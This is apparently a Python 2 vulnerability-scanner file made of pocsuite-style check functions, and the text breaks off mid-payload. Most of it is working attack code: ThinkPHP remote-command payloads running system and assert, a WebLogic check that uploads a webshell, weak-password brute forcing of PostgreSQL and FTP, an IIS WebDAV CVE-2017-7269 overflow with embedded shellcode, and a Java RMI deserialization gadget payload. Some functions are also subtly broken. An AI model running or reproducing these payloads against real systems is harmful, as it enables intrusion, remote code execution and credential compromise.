def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = '5984'
#检测漏洞
url = 'http://%s:%s/_config/' % (_host, _port)
try:
req_code = req.get(url,
timeout=5,
allow_redirects=True,
verify=False).status_code
# print req_code
if req_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = url
except Exception as e:
# return host
print e
pass
print '[+]26 poc done'
return self.save_output(result)
def _verify(self):
result = {}
vul_url = '%s' % self.url
import re
import time
import ftplib
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = 22
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
except Exception:
return self.save_output(result)
sk.close()
resulta = checkUsername("rootasdf23", _host)
if (resulta == "1"):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result = {}
#如果设置端口则取端口,没有设置则为默认端口
import re
vul_url = "%s" % self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "7001"
vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
try:
response = req.get(url=vul_ip, timeout=5,
allow_redirects=False) #禁止重定向
if (response.status_code == 200 and "WSDL" in response.text):
url = "/ws_utc/resources/setting/keystore"
target = "http://%s:%s/" % (_host, _port)
response = upload_webshell(target, url)
if (response != ""):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = response
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = 443
#s = socket.socket()
#socket.setdefaulttimeout(1)
#检测漏洞
try:
ret = ssltest(_host, _port)
# print ret
if ret == "check":
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = host
result['VerifyInfo']['Payload'] = payload
else:
pass
except:
pass
print '[+]20 poc done'
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result={}
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
import time
vul_url = "%s"%self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else :
_host = url2ip(vul_url)
_port = 80
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host,_port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
vul_ip = "http://%s:%s/" % (_host, _port)
payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
for p in payloads2:
url=vul_ip+p
try:
text = req.get(url,timeout=4).text
if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
def _verify(self):
import psycopg2
#调用指纹方法
result = {}
passwd = [
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016',
'{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678',
'test', '123qwe!@#', '123456789', '123321', '1314520', '666666',
'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty',
'1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357',
'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1',
'r00t', 'system', '111111', 'admin'
]
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_host = url2ip(self.url)[0]
_port = url2ip(self.url)[1]
else:
_host = url2ip(self.url)
_port = "5432"
print _host, _port
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
#print 'Server port is OK!'
except Exception:
print 'port not alive'
return self.save_output(result)
sk.close()
output = Output(self)
message = ''
for pwd in passwd:
try:
pwd = pwd.replace('{user}', 'postgres')
conn = psycopg2.connect(host=_host,
port=_port,
user='******',
password=pwd)
message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format(
_host, pwd)
print "有弱口令漏洞"
conn.close()
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['Payload'] = message
break
except Exception as e:
print e
print '[+]29 poc done'
return self.save_output(result)
def _verify(self):
result = {}
vul_url = '%s' % self.url
import re
import time
import ftplib
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else:
_host = url2ip(vul_url)
_port = 21
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
flag = False
payload = "弱口令"
# username = ["www","db","wwwroot","data","web","ftp","anonymous","admin","Admin","Administrator","administrator","root","ADMIN"]
username = [
'anonymous',
]
password = [
"", "toor", "1234", "123456", "admin", "Admin", "ADMIN",
"admin123", "Admin123", "root", "root123", "123.com"
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
'123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
'000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
'system', '111111', 'admin'
]
for u in username:
for p in password:
socket.setdefaulttimeout(1)
ftp = ftplib.FTP()
try:
print u, p
ftp.connect(_host, _port)
ftp.login(u, p)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = u + p
return self.save_output(result)
except Exception, e:
ftp.close()
continue
def _verify(self):
# ip = self.url.split(':')[1].replace('/', '')
#from api.utils import url2ip
#--------------找url中 冒号后的web端口
import re
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_port = url2ip(self.url)[1]
else:
_port = 80
#-------------
ip = url2ip(self.url)
import socket
result={}
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'
pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
pay += shellcode
pay += '>\r\n\r\n'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, _port))# ip port
sock.send(pay)
try:
data = sock.recv(80960)
except:
print '连接失败'
pass
print '-'*18+'\n'
print data
print '-'*18+'\n'
sock.close()
if not -1 == data.find('HHIT CVE-2017-7269 Success'):
message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!'
print(message)
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = pay
return True
else:
print '没有发现关键字.'
return False
return self.save_output(result)
def _verify(self):
import socket
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "10001"
#jar包头
payload_one = '\x4a\x52\x4d\x49\x00\x02\x4b\x00\x0d\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x34\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x12\x70\x77\x6e\x65\x64\x39\x37\x34\x31\x30\x30\x36\x31\x34\x30\x31\x32\x33\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x72\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x70\x78\x72\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x70\x78\x70\x73\x72\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x11\x0e\x3e\x84\x8f\xbd\xce\x48\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x0f\x70\x78\x72\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x11\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x11\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x11\x70\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00'
#import binascii
#print binascii.b2a_hex(payload_one).decode('hex')
#jar包尾
payload_three = '\x71\x00\x7e\x00\x19\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x76\x72\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x0f\x70\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x70\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x70\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x70\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x70\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x70\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x70\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63